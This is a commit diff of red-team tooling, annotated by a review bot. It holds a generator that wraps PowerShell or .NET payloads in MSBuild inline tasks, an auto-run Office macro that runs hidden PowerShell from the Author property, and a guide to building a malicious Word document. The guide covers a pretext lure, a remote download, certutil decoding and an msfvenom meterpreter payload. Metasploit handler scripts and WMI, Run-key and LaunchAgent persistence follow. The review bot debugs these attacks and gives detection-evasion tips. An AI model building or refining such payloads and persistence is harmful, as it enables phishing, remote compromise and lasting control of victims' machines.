Private Sub DeleteWarningPicture(ByVal textBoxName As String, ByVal saveDocAfter As Boolean)
Dim shape As Word.shape
For Each shape In ActiveDocument.Shapes
If StrComp(shape.Name, textBoxName) = 0 Then
shape.Delete
Exit For
End If
Next
If saveDocAfter Then
ActiveDocument.Save
End If
End Sub
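Review bot: The loop variable `shape` at L670-L671 shadows the `Word.Shape` type it is declared with, which is legal in VBA but makes `shape.Delete` read ambiguously; rename it to `shp`. The Sub has no header comment; the README describes its purpose, so a two-line header saying it deletes the first shape whose name equals `textBoxName` and saves the document when `saveDocAfter` is set would make the file self-describing. `StrComp` at L672 is called without a compare argument, so the comparison follows the module's Option Compare setting; pass `vbBinaryCompare` or `vbTextCompare` explicitly to make the intended case sensitivity clear.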


@ -0,0 +1,234 @@
#!/usr/bin/python3
#
# Red-Teaming script that will leverage MSBuild technique to convert Powershell input payload or
# .NET/CLR assembly EXE file into inline-task XML file that can be further launched by:
# %WINDIR%\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
#
# Requirements:
# - pefile
#
# Mariusz B. / mgeeky, <mb@binary-offensive.com>
#
import re
import io
import sys
import gzip
import base64
import string
import struct
import random
import argparse
try:
import pefile
except ImportError:
print('Missing requirement: "pefile". Install it using: pip install pefile')
sys.exit(-1)
def getCompressedPayload(filePath):
out = io.BytesIO()
encoded = ''
with open(filePath, 'rb') as f:
inp = f.read()
with gzip.GzipFile(fileobj = out, mode = 'w') as fo:
fo.write(inp)
encoded = base64.b64encode(out.getvalue())
powershell = "$s = New-Object IO.MemoryStream(, [Convert]::FromBase64String('{}')); IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream($s, [IO.Compression.CompressionMode]::Decompress))).ReadToEnd();".format(
encoded.decode()
)
return powershell
def getInlineTask(payload, exeFile):
templateName = ''.join(random.choice(string.ascii_letters) for x in range(random.randint(5, 15)))
taskName = ''.join(random.choice(string.ascii_letters) for x in range(random.randint(5, 15)))
powershellLaunchCode = string.Template('''<Task>
<Reference Include="System.Management.Automation" />
<Code Type="Class" Language="cs">
<![CDATA[
using System.Management.Automation;
using System.Management.Automation.Runspaces;
using Microsoft.Build.Framework;
using Microsoft.Build.Utilities;
public class $templateName : Task {
public override bool Execute() {
byte[] payload = System.Convert.FromBase64String("$payload2");
string decoded = System.Text.Encoding.UTF8.GetString(payload);
Runspace runspace = RunspaceFactory.CreateRunspace();
runspace.Open();
Pipeline pipeline = runspace.CreatePipeline();
pipeline.Commands.AddScript(decoded);
pipeline.Invoke();
runspace.Close();
return true;
}
}
]]>
</Code>''').safe_substitute(
templateName = templateName,
payload2 = base64.b64encode(payload)
)
exeLaunchCode = string.Template('''<ParameterGroup/>
<Task>
<Using Namespace="System" />
<Using Namespace="System.Reflection" />
<Code Type="Fragment" Language="cs">
<![CDATA[
string payload = "$payload2";
byte[] decoded = System.Convert.FromBase64String(payload);
Assembly asm = Assembly.Load(decoded);
MethodInfo method = asm.EntryPoint;
object instance = asm.CreateInstance(method.Name);
method.Invoke(instance, null);
]]>
</Code>''').safe_substitute(
payload2 = base64.b64encode(payload)
)
launchCode = exeLaunchCode if exeFile else powershellLaunchCode
template = string.Template('''<Project xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<!-- Based on Casey Smith work, Twitter: @subTee -->
<!-- Automatically generated using `generateMSBuildPowershellXML.py` utility -->
<!-- by Mariusz B. / mgeeky <mb@binary-offensive.com> -->
<Target Name="$taskName">
<$templateName />
</Target>
<UsingTask TaskName="$templateName" TaskFactory="CodeTaskFactory"
AssemblyFile="C:\\Windows\\Microsoft.Net\\Framework\\v4.0.30319\\Microsoft.Build.Tasks.v4.0.dll" >
$launchCode
</Task>
</UsingTask>
</Project>''').safe_substitute(
taskName = taskName,
templateName = templateName,
launchCode = launchCode
)
return template
def detectFileIsExe(filePath, forced = False):
first1000 = []
with open(filePath, 'rb') as f:
first1000 = f.read()[:1000]
if not (first1000[0] == 'M' and first1000[1] == 'Z'):
return False
elfanew = struct.unpack('<H', first1000[0x3c:0x3c + 2])[0]
if not (first1000[elfanew + 0] == 'P' and first1000[elfanew + 1] == 'E'):
return False
dosStub = "This program cannot be run in DOS mode."
printables = ''.join([x for x in first1000[0x40:] if x in string.printable])
#if not dosStub in printables:
# return False
try:
pe = pefile.PE(filePath)
cli = pe.OPTIONAL_HEADER.DATA_DIRECTORY[14]
if not (cli.VirtualAddress != 0 and cli.Size != 0):
sys.stderr.write('[!] Specified input file is not a .NET Assembly / CLR executable file!\n')
if forced:
sys.exit(-1)
raise Exception()
else:
sys.stderr.write('[+] Specified EXE file seems to be .NET Assembly / CLR compatible.\n')
return True
except:
pass
return False
def minimize(output):
output = re.sub(r'\s*\<\!\-\- .* \-\-\>\s*\n', '', output)
output = output.replace('\n', '')
output = re.sub(r'\s{2,}', ' ', output)
output = re.sub(r'\s+([^\w])\s+', r'\1', output)
output = re.sub(r'([^\w"])\s+', r'\1', output)
variables = {
'payload' : 'x',
'method' : 'm',
'asm' : 'a',
'instance' : 'o',
'pipeline' : 'p',
'runspace' : 'r',
'decoded' : 'd'
}
for k, v in variables.items():
output = output.replace(k, v)
return output
def opts(argv):
parser = argparse.ArgumentParser(prog = argv[0], usage='%(prog)s [options] <inputFile>')
parser.add_argument('inputFile', help = 'Input file to be encoded within XML. May be either Powershell script or PE/EXE file.')
parser.add_argument('-m', '--minimize', action='store_true', help = 'Minimize the output XML file.')
parser.add_argument('-b', '--encode', action='store_true', help = 'Base64 encode output XML file.')
parser.add_argument('-e', '--exe', action='store_true', help = 'Specified input file is an Mono/.Net assembly PE/EXE (optional, if not used - the script will try to sense that). WARNING: Launching EXE is possibly ONLY WITH MONO/.NET IL/Assembly EXE file, not an ordinary native PE/EXE!')
args = parser.parse_args()
return args
def main(argv):
sys.stderr.write('''
:: Powershell via MSBuild inline-task XML payload generation script
To be used during Red-Team assignments to launch Powershell payloads without using 'powershell.exe'
Mariusz B. / mgeeky, <mb@binary-offensive.com>
''')
if len(argv) < 2:
print('Usage: ./generateMSBuildPowershellXML.py <inputFile>')
sys.exit(-1)
args = opts(argv)
isItExeFile = args.exe or detectFileIsExe(args.inputFile, args.exe)
if isItExeFile:
sys.stderr.write('[?] File recognized as PE/EXE.\n\n')
with open(args.inputFile, 'rb') as f:
payload = f.read()
else:
sys.stderr.write('[?] File not recognized as PE/EXE.\n\n')
if args.inputFile.endswith('.exe'):
return False
payload = getCompressedPayload(args.inputFile)
output = getInlineTask(payload, isItExeFile)
if args.minimize:
output = minimize(output)
if args.encode:
print(base64.b64encode(output))
else:
print(output)
if __name__ == '__main__':
main(sys.argv)


@ -0,0 +1,12 @@
Private Sub Workbook_Open()
Dim author As String
author = ActiveWorkbook.BuiltinDocumentProperties("Author")
Dim ws As Object
Set ws = CreateObject("WScript.Shell")
With ws.Exec("powershell.exe -nop -WindowStyle hidden -Command -")
.StdIn.WriteLine author
.StdIn.WriteBlankLines 1
.Terminate
End With
End Sub
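Review bot: `.Terminate` directly after the two `StdIn` writes kills powershell.exe without ever closing its standard input; since `-Command -` takes the script from stdin, if the process has not yet consumed and run the line (I believe it reads until EOF) the command is silently lost, so prefer `.StdIn.Close` and let the child exit on its own rather than terminating it. The `Author` property is executed verbatim as PowerShell with no validation, which deserves a comment such as `' Author property is executed as-is: whoever can edit document metadata controls what runs`. Note that the markdown write-up in this same commit spells the call `WriteBlankLine` while this file uses `WriteBlankLines`; only the latter exists on a TextStream, and the write-up's `On Error Resume Next` hides the mismatch. For operators: an Excel process spawning `powershell.exe -nop -WindowStyle hidden` is a high-signal parent/child pair for EDR, so this is the stage most likely to be caught.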


@ -0,0 +1,89 @@
<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<!-- Original Author: Pierre-Alexandre Braeken, Twitter: @pabraeken -->
<!-- Based on Casey Smith work (https://gist.github.com/subTee/ca477b4d19c885bec05ce238cbad6371), Twitter: @subTee -->
<!-- To be launched like so: cmd> %WINDIR%\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe task1.xml -->
<!-- Modified by Mariusz B. / mgeeky. -->
<Target Name="MyLittleInlineTaskName">
<MyLittleInlineTask />
</Target>
<UsingTask
TaskName="MyLittleInlineTask"
TaskFactory="CodeTaskFactory"
AssemblyFile="C:\Windows\Microsoft.Net\Framework\v4.0.30319\Microsoft.Build.Tasks.v4.0.dll" >
<Task>
<Reference Include="System.Management.Automation" />
<Code Type="Class" Language="cs">
<![CDATA[
using System;
using System.IO;
using System.Diagnostics;
using System.Reflection;
using System.Runtime.InteropServices;
using System.Collections.ObjectModel;
using System.Management.Automation;
using System.Management.Automation.Runspaces;
using System.Text;
using Microsoft.Build.Framework;
using Microsoft.Build.Utilities;
public class MyLittleInlineTask : Task, ITask {
public override bool Execute() {
// Is your payload a raw EXE file?
bool rawExeFile = false;
if(!rawExeFile) {
/*
* Specifies whether Powershell payload is Base64 encoded.
*/
bool payloadBase64Encoded = false;
/*
* Here insert your plain multi-line Powershell snippet
*/
string payload = @"
$s = New-Object IO.MemoryStream(, [Convert]::FromBase64String('H4sIAMkfcloC/3u/e390cGVxSWquXlBqWk5qcklmfp6eY3Fxam5STmWslZVPfmJKeGZJRkBiUUlmYo5fYm6qhhJUR3hmXkp+ebGeW35RbrGSpkKNgn9pia5faU6ONS9XNDZFer6pxcWJ6alO+RVAs4Mz8ss11D1LFMrzi7KLFdU1rQFOfXYfjwAAAA=='));
IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream($s, [IO.Compression.CompressionMode]::Decompress))).ReadToEnd();
";
Runspace runspace = RunspaceFactory.CreateRunspace();
runspace.Open();
RunspaceInvoke scriptInvoker = new RunspaceInvoke(runspace);
Pipeline pipeline = runspace.CreatePipeline();
if (!payloadBase64Encoded) {
pipeline.Commands.AddScript(payload);
}
else {
string payload2 = System.Text.Encoding.UTF8.GetString(System.Convert.FromBase64String(payload));
pipeline.Commands.AddScript(payload2);
}
pipeline.Invoke();
runspace.Close();
}
else {
/*
* Here must be placed Base64 encoded raw EXE / PE file.
*/
string payload = "TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAA [...]";
byte[] decoded = System.Convert.FromBase64String(payload);
Assembly asm = Assembly.Load(decoded);
MethodInfo method = asm.EntryPoint;
object ob = asm.CreateInstance(method.Name);
method.Invoke(ob, null);
}
return true;
}
}
]]>
</Code>
</Task>
</UsingTask>
</Project>
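Review bot: In the raw-EXE branch `asm.CreateInstance(method.Name)` is handed a method name (`Main`) where `CreateInstance` expects a type name, so `ob` is always null; that happens to work because entry points are static, but `method.Invoke(ob, null)` then throws `TargetParameterCountException` for any assembly whose `Main` takes `string[] args`. Replace the two lines with `object[] args = method.GetParameters().Length == 0 ? null : new object[] { new string[0] };` and `method.Invoke(null, args);` — the Python generator's `exeLaunchCode` template in this commit emits the same pair and needs the same change. In the PowerShell branch `RunspaceInvoke scriptInvoker` is created and never used, and `runspace.Close()` is skipped when `pipeline.Invoke()` throws, so wrap the runspace in `using` or try/finally. Worth a header comment that on .NET 4.8+ `Assembly.Load(byte[])` is, to my knowledge, subject to AMSI scanning, since that limits where the EXE path is usable.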

218
red-teaming/muti-stage-1.md Normal file

@ -0,0 +1,218 @@
# Multi-Stage Penetration-Testing / Red Teaming Malicious Word document creation process
The below paper documents the process of creating a multi-stage IPS/AV transparent malicious document for purposes of Red Teaming / Penetration-Testing assignments.
The resulted document will be:
- using OLE event autorun method
- removing it's pretext shapes
- Obtaining commands to be executed from document's _Author_ property and passing them to `StdIn` of _Powershell.exe_ process
- Leveraging `certutil` technique to receive Base64 encoded malicious HTA document
- Having Base64 encoded Powershell command in that _Author_ property
- Having fully Obfuscated VBA macro
---
1. Create an empty Word document with extension `.doc`
---
2. Create an OLE object named `Microsoft InkPicture Control` (_Developer tab -> Insert -> More controls -> ... _)
---
3. Double click on that OLE object and add the following method:
```
Public Once As Integer
Public Sub Launch()
On Error Resume Next
'
' Here will be malicious code placed
'
End Sub
Private Sub InkPicture1_Painted(ByVal hDC As Long, ByVal Rect As MSINKAUTLib.IInkRectangle)
If Once < 1 Then
Launch
End If
Once = Once + 1
End Sub
```
Since the `Painted` event will be triggered several times, we want to avoid situation of having several stagers popped on the target machine.
---
4. Then, add pretext shape enticing victim to enable editing/macros - having that, insert a function that will delete this shape after victim really enable macros.
For example of such shape - you can refer to one of my [repos](https://github.com/mgeeky/RobustPentestMacro).
**NOTICE**: Make sure to put the OLE Control in the topmost left corner of the document and to color that control (right click -> Propertied -> Color) so it will overlap visually with Pretext-shape.
The trick is to make the victim move the mouse over that OLE control after enabling macros (making it trigger `Painted` event in the background).
The function that will delete this and OLE object shapes after enabling macros is placed below:
```
Public Sub Launch()
On Error Resume Next
DeleteWarningShape "warning-div", True
DeleteWarningShape "Control 2", True
...
End Sub
Private Sub DeleteWarningShape(ByVal textBoxName As String, ByVal saveDocAfter As Boolean)
Dim shape As Word.shape
On Error Resume Next
For Each shape In ActiveDocument.Shapes
If StrComp(shape.Name, textBoxName) = 0 Then
shape.Delete
Exit For
End If
Next
If saveDocAfter Then
ActiveDocument.Save
End If
End Sub
```
---
5. Now, add code obtaining malicious _Powershell_ commands from _Author_ document's property and passing it to the _Powershell's_ `StdIn` stream:
```
Public Sub Launch()
On Error Resume Next
DeleteWarningShape "warning-div", True
DeleteWarningShape "Control 2", True
Dim authorProperty As String
authorProperty = ActiveDocument.BuiltInDocumentProperties("Author")
Set objWShell = CreateObject("WScr" & "ipt.S" & "hell")
With objWShell.Exec("powe" & "rsh" & "ell.exe -no" & "p -w" & "indowstyle hid" & "den -Com" & "mand -")
.StdIn.WriteLine authorProperty
.StdIn.WriteBlankLine 1
.Terminate
End With
```
Of course, having that - you will have to remember to add proper Powershell command to be executed right into _Author_ property of the Word file.
---
6. Now, we have to insert some code into that _Author_ property. This code should do the following:
- Download Base64 encoded `encoded.crt` file containing malicious HTA code.
- Use `certutil -decode encoded.crt out.hta` command that will strip that Base64 layer.
- Make entire powershell code that shall be placed in _Author_ property Unicode-Base64 encoded in such a way, that Powershell's `-EncodedCommand` will be able to process.
The following code can be use as an example:
```
powershell -ep bypass -Command "(new-object Net.WebClient).DownloadFile('http://192.168.56.101/encoded.crt','%TEMP%\encoded.crt');certutil -decode %TEMP%\encoded.crt %TEMP%\encoded.hta;start %TEMP%\encoded.hta"
```
Here, the file will be obtained from `http://192.168.56.101/encoded.crt` - of course, one will want to move that file into HTTPS webserver having some luring domain name.
This command can be then converted into Powershell-supported Base64 payload like so:
```
C:\Users\IEUser\Desktop\files\dl>powershell -ep bypass -command "[Convert]::ToBase64String([System.Text.Encoding]::Unicode.GetBytes(\"(new-object Net.WebClient).DownloadFile('http://192.168.56.101/encoded.crt','%TEMP%\encoded.crt');certutil -decode %TEMP%\encoded.crt %TEMP%\encoded.hta;start %TEMP%\encoded.hta\"))"
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
```
Now this code is to be placed into _Author_ property.
---
7. Now, in order to generate that `encoded.crt` file - go for the following steps:
- Step 1: Using `msfvenom` generate malicious HTA file
- Step 2: Convert that payload into Base64-encoded certificate file.
In order to automate above steps - you can use the below script:
```
#!/bin/bash
# --- PAYLOAD SETUP
LHOST=192.168.56.101
LPORT=4444
PAYLOAD=windows/meterpreter/reverse_tcp
# This file must have *.crt extension
OUTPUT_FILE=/var/www/html/encoded.crt
PAYLOAD_FILE=/tmp/test$RANDOM
# ----
msfvenom -f hta-psh -p $PAYLOAD LHOST=$LHOST LPORT=$LPORT -o $PAYLOAD_FILE
echo -----BEGIN CERTIFICATE----- > $OUTPUT_FILE
cat $PAYLOAD_FILE | base64 -w 0 >> $OUTPUT_FILE
echo -----END CERTIFICATE----- >> $OUTPUT_FILE
chown www-data:www-data $OUTPUT_FILE 2> /dev/null
echo "Generated file: $OUTPUT_FILE"
```
And Voila! You will have your `encoded.crt` file in webroot.
---
8. After that you can add some persistence methods and further fail-proof the Macro code. For a nice example of persistence method - the `WMIPersistence` method can be used:
[WMIPersistence](https://gist.github.com/mgeeky/d00ba855d2af73fd8d7446df0f64c25a)
---
9. After that, you will want to make the entire VBA macro code become obfuscated to further slow down analysis process.
The obfuscation can easily be pulled off using my [VisualBasicObfuscator](https://github.com/mgeeky/VisualBasicObfuscator)
---
## ENTIRE MACRO CAN LOOK LIKE THIS:
(without persistence method)
```
Public Once As Integer
Public Sub Launch()
On Error Resume Next
DeleteWarningShape "warning-div", False
DeleteWarningShape "Control 2", False
Dim authorProperty As String
authorProperty = ActiveDocument.BuiltInDocumentProperties("Author")
Set objWShell = CreateObject("WScr" & "ipt.S" & "hell")
With objWShell.Exec("powe" & "rsh" & "ell.exe -no" & "p -w" & "indowstyle hid" & "den -Com" & "mand -")
.StdIn.WriteLine authorProperty
.StdIn.WriteBlankLine 1
.Terminate
End With
End Sub
Private Sub DeleteWarningShape(ByVal textBoxName As String, ByVal saveDocAfter As Boolean)
Dim shape As Word.shape
On Error Resume Next
For Each shape In ActiveDocument.Shapes
If StrComp(shape.Name, textBoxName) = 0 Then
shape.Delete
Exit For
End If
Next
If saveDocAfter Then
ActiveDocument.Save
End If
End Sub
Private Sub InkPicture1_Painted(ByVal hDC As Long, ByVal Rect As MSINKAUTLib.IInkRectangle)
If Once < 1 Then
Launch
End If
Once = Once + 1
End Sub
```


@ -0,0 +1,19 @@
use exploit/multi/handler
setg PAYLOAD windows/x64/meterpreter/reverse_https
setg LHOST <ATTACKER-IP>
setg LPORT 443
setg VERBOSE true
setg ExitOnSession false
setg Powershell::sub_funcs true
setg Powershell::sub_vars true
setg EnableStageEncoding true
setg StagerRetryCount 30
setg StagerRetryWait 10
exploit -j
use exploit/multi/script/web_delivery
set TARGET 2
set SRVPORT 8080
set SSL true
set URIPATH msf
set DisablePayloadHandler true
exploit -j
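Review bot: The resource script has no comments explaining why the handler is started first with `setg` and why `web_delivery` then sets `DisablePayloadHandler true`; a reader who runs only the second half gets a stager with no listener. Suggest a header such as `# Stage 1: shared reverse_https handler on 443 (setg so web_delivery inherits PAYLOAD/LHOST/LPORT)` and `# Stage 2: PowerShell web_delivery (TARGET 2) on 8080/SSL; handler disabled because stage 1 owns it`. Because `setg` makes PAYLOAD, LHOST and LPORT global, every module loaded later in this console inherits them; if that is not intended, use `set` in the handler block and repeat the three options under web_delivery. `<ATTACKER-IP>` is a placeholder msfconsole will reject as-is, so say so in the header.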


@ -0,0 +1,81 @@
#If VBA7 Then
' 64-bit Mac (2016)
Private Declare PtrSafe Function system Lib "libc.dylib" Alias "system" _
(ByVal command As String) As Long
Private Declare PtrSafe Function fopen Lib "libc.dylib" Alias "fopen" _
(ByVal file As String, ByVal mode As String) As LongPtr
Private Declare PtrSafe Function fputs Lib "libc.dylib" Alias "fputs" _
(ByVal str As String, ByVal file As LongPtr) As Long
Private Declare PtrSafe Function fclose Lib "libc.dylib" Alias "fclose" _
(ByVal file As LongPtr) As Long
#Else
' 32-bit Mac
Private Declare Function system Lib "libc.dylib" Alias "system" _
(ByVal command As String) As Long
Private Declare Function fopen Lib "libc.dylib" Alias "fopen" _
(ByVal file As String, ByVal mode As String) As Long
Private Declare Function fputs Lib "libc.dylib" Alias "fputs" _
(ByVal str As String, ByVal file As Long) As Long
Private Declare Function fclose Lib "libc.dylib" Alias "fclose" _
(ByVal file As Long) As Long
#End If
Sub writeToFile(ByVal file As String, ByVal txt As String)
#If Mac Then
#If VBA7 Then
Dim fp As LongPtr
#Else
Dim fp As Long
#End If
Dim grants
grants = Array(file)
GrantAccessToMultipleFiles(grants)
' BUG: fopen will return 0 here.
fp = fopen(file, "w")
If fp = 0 Then: Exit Sub
fputs txt, fp
fclose(fp)
#End If
End Sub
Sub MacPersistence(ByVal cmd As String, ByVal taskName As String)
Dim plist As String
plist = "<?xml version=""1.0"" encoding=""UTF-8""?>\n"
plist = plist & "<!DOCTYPE plist PUBLIC ""-//Apple Computer//DTD "
plist = plist & "PLIST 1.0//EN"" ""http://www.apple.com/DTDs/plist"
plist = plist & " = plist & PropertyList-1.0.dtd"">\n"
plist = plist & "<plist version=""1.0"">\n
plist = plist & "<dict>\n"
plist = plist & " <key>Label</key>\n"
plist = plist & " <string>" & taskName & "</string>\n"
plist = plist & " <key>ProgramArguments</key>\n"
plist = plist & " <array>\n"
plist = plist & " <string>/bin/bash</string>\n"
plist = plist & " <string>-c</string>\n"
plist = plist & " <string>'" & cmd & "'</string>\n"
plist = plist & " </array>\n"
plist = plist & " <key>RunAtLoad</key>\n"
plist = plist & " <true/>\n"
plist = plist & " <key>KeepAlive</key>\n"
plist = plist & " <true/>\n"
plist = plist & "</dict>\n"
plist = plist & "</plist>\n"
' TODO: File writing does not work at the moment, most likely due to
' apps sandboxing mechanism enforced by the system.
' Approach #1: File write by system command
' system("echo -e """ & plist & """ > ~/Library/LaunchAgents/" & taskName)
' Approach #2: File write by fopen+fputs+fclose
Dim fileName As String
fileName = "~/Library/LaunchAgents/" & taskName & ".plist"
writeToFile fileName, plist
End Sub
Sub TestMacPersistence()
MacPersistence "/Applications/Calculator.app/Contents/MacOS/Calculator", "com.java.update"
End Sub
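Review bot: `MacPersistence` cannot compile as written: `plist = plist & "<plist version=""1.0"">\n` is missing its closing quote, and the line before it, `plist = plist & " = plist & PropertyList-1.0.dtd"">\n"`, has a fragment of VBA pasted into the string so the DOCTYPE URL is garbage. VBA also does not interpret `\n` inside string literals, so every `\n` in the plist would be written literally and launchd would reject the file; newlines must be concatenated as `vbLf`. The `BUG: fopen will return 0` comment in `writeToFile` is at least partly explained by `fileName = "~/Library/LaunchAgents/..."`: libc `fopen` does not expand `~`, so resolve the home directory first (e.g. `Environ("HOME")`, if that is available in the target Office build) before attributing the failure to sandboxing. Finally, `cmd` is wrapped in single quotes inside the `<string>` handed to `bash -c`, so any command containing `'` breaks the argument.
```vba
Sub MacPersistence(ByVal cmd As String, ByVal taskName As String)
    Dim plist As String
    plist = "<?xml version=""1.0"" encoding=""UTF-8""?>" & vbLf
    plist = plist & "<!DOCTYPE plist PUBLIC ""-//Apple Computer//DTD PLIST 1.0//EN"" " _
        & """http://www.apple.com/DTDs/PropertyList-1.0.dtd"">" & vbLf
    plist = plist & "<plist version=""1.0"">" & vbLf
    ' … unchanged: <dict> … </plist> lines, each trailing "\n" replaced by & vbLf …
    Dim fileName As String
    fileName = Environ("HOME") & "/Library/LaunchAgents/" & taskName & ".plist"
    writeToFile fileName, plist
End Sub
```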


@ -0,0 +1,105 @@
'
' SYNOPSIS:
' This macro implements two windows persistence methods:
' - WMI Event Filter object creation
' - simple HKCU Registry Run value insertion. It has to be HKCU to make it work under Win10 x64
'
' WMI Persistence method as originally presented by SEADADDY malware
' (https://github.com/pan-unit42/iocs/blob/master/seaduke/decompiled.py#L887)
' and further documented by Matt Graeber.
'
' The scheduled command will be launched after roughly 3 minutes since system
' gets up. Also, even if the command shall spawn a window - it will not be visible,
' since the command will get invoked by WmiPrvSE.exe that's running in Session 0.
'
' USAGE:
' WindowsPersistence("command to be launched", "taskName")
'
' EXAMPLE:
' WindowsPersistence "powershell -noP -sta -w 1 -enc WwBSAGUAZgBdAC4AQQ[...]EUAWAA=", "WindowsUpdater"
'
' AUTHOR:
' Mariusz B. / mgeeky, '17
'
Public Function WMIPersistence(ByVal exePath As String, ByVal taskName As String) As Boolean
Dim filterName, consumerName As String
Dim objLocator, objService1
Dim objInstances1, objInstances2, objInstances3
Dim newObj1, newObj2, newObj3
On Error GoTo Failed
filterName = taskName & "Event"
consumerName = taskName & "Consumer"
Set objLocator = CreateObject("WbemScripting.SWbemLocator")
Set objService1 = objLocator.ConnectServer(".", "root\subscription")
'
' Step 1: Set WMI Instance of type Event Filter
'
Set objInstances1 = objService1.Get("__EventFilter")
' The malware originally will kicks in after roughly 3 minutes since System gets up.
' One can modify this delay time by modifying the WHERE clausule of the below query.
Query = "SELECT * FROM __InstanceModificationEvent WITHIN 60 " _
& "WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System' " _
& "AND TargetInstance.SystemUpTime >= 200 AND " _
& "TargetInstance.SystemUpTime < 320"
' New object of type __EventFilter
Set newObj1 = objInstances1.Spawninstance_
newObj1.Name = filterName
newObj1.eventNamespace = "root\cimv2"
newObj1.QueryLanguage = "WQL"
newObj1.Query = Query
newObj1.Put_
'
' Step 2: Set WMI instance of type: CommandLineEventConsumer
'
Set objInstances2 = objService1.Get("CommandLineEventConsumer")
Set newObj2 = objInstances2.Spawninstance_
newObj2.Name = consumerName
newObj2.CommandLineTemplate = exePath
newObj2.Put_
'
' Step 3: Set WMI instance of type: Filter To Consumer Binding
'
Set objInstances3 = objService1.Get("__FilterToConsumerBinding")
Set newObj3 = objInstances3.Spawninstance_
newObj3.Filter = "__EventFilter.Name=""" & filterName & """"
newObj3.Consumer = "CommandLineEventConsumer.Name=""" & consumerName & """"
newObj3.Put_
WMIPersistence = True
Exit Function
Failed:
WMIPersistence = False
End Function
Public Function RegistryPersistence(ByVal exePath As String, ByVal taskName As String) As Boolean
On Error GoTo Failed
Const HKEY_CURRENT_USER = &H80000001
strKeyPath = "Software\Microsoft\Windows\CurrentVersion\Run"
strComputer = "."
Set objReg = GetObject("winmgmts:{impersonationLevel=impersonate}!\\" & strComputer & "\root\default:StdRegProv")
strValueName = taskName
strValue = exePath
objReg.SetExpandedStringValue HKEY_CURRENT_USER, strKeyPath, strValueName, strValue
RegistryPersistence = True
Exit Function
Failed:
RegistryPersistence = False
End Function
Public Function WindowsPersistence(ByVal exePath As String, ByVal taskName As String) As Boolean
If WMIPersistence(exePath, taskName) <> True Then
RegistryPersistence exePath, taskName
End If
End Function
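Review bot: `WindowsPersistence` never assigns its return value, so it reports `False` even when `WMIPersistence` succeeds, and the result of the registry fallback is discarded as well; callers testing the Boolean learn nothing. Change the body to `WindowsPersistence = WMIPersistence(exePath, taskName)` followed by `If Not WindowsPersistence Then WindowsPersistence = RegistryPersistence(exePath, taskName)`. Writing to `root\subscription` requires administrative rights, which is presumably why the HKCU fallback exists; a one-line comment on the `If` (`' WMI subscription needs admin; fall back to per-user Run key`) would make that explicit. Minor: `Dim filterName, consumerName As String` types only `consumerName` (`filterName` is a Variant), and `Query`, `strKeyPath`, `strComputer`, `objReg`, `strValueName` and `strValue` are never declared — add `Option Explicit` and `Dim` them.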

Binary file not shown.

Binary file not shown.